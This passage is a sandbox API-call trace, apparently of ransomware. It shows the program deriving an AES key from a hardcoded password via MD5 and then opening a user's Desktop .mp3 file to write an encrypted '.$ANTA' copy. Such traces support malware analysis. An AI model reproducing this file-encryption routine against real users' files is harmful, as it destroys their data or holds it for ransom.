hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0122.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0122.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0122.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0122.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0122.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0122.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0122.480] CloseHandle (hObject=0x2a0) returned 1 [0122.480] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.481] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0122.481] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CgH9zawVTY35raopEyZt.mp3", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0537ea0, ftCreationTime.dwHighDateTime=0x1d5ea99, ftLastAccessTime.dwLowDateTime=0x2b4da1f0, ftLastAccessTime.dwHighDateTime=0x1d5ee75, ftLastWriteTime.dwLowDateTime=0x2b4da1f0, ftLastWriteTime.dwHighDateTime=0x1d5ee75, nFileSizeHigh=0x0, nFileSizeLow=0x18e62, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="CgH9zawVTY35raopEyZt.mp3", cAlternateFileName="CGH9ZA~1.MP3")) returned 0x41ac640 [0122.481] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0122.481] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.481] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.481] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0122.481] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.481] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0122.482] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0122.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.482] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0122.482] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.482] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.482] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.483] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0122.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.485] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0122.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.485] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca958, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.485] CryptHashData (hHash=0x41ac600, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0122.485] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.485] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca790, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.486] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0122.486] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797028, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.486] CryptDestroyHash (hHash=0x41ac600) returned 1 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0122.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0122.487] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0122.487] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0122.487] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.488] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CgH9zawVTY35raopEyZt.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\cgh9zawvty35raopeyzt.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0122.488] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.488] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0122.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0122.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0122.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.488] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0122.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0122.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0122.488] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0122.488] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0122.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392688 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392688 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0122.490] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0122.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0122.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.491] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CgH9zawVTY35raopEyZt.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\cgh9zawvty35raopeyzt.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, 